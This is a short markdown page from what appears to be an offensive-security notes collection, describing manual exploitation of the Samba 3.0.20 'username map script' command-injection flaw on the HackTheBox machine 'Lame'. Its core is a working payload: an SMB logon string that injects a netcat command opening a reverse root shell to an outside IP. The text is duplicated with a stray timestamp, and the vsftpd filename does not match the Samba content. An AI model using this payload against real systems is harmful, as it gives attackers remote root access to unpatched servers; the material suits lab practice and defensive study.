killchain-compendium/Exploits/SMB/vsftpd_234_backdoor.md

# SMB Exploits

## usermap_script.rb

There can be a need to do manual exploitation for `Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)` like the HTB box `Lame` shows.
Since the automated exploit does not work, log in anonymously without an account and do the following
```sh
smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"
```
A connection to the root shell is provided.
smb exploit 2022-12-29 01:37:26 +01:00			`# SMB Exploits`

			`## usermap_script.rb`

			There can be a need to do manual exploitation for `Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit)` like the HTB box `Lame` shows.
			`Since the automated exploit does not work, log in anonymously without an account and do the following`
			```sh
			smb: \> logon "./=`nohup nc -e /bin/sh 10.10.17.20 4444`"
			```
			`A connection to the root shell is provided.`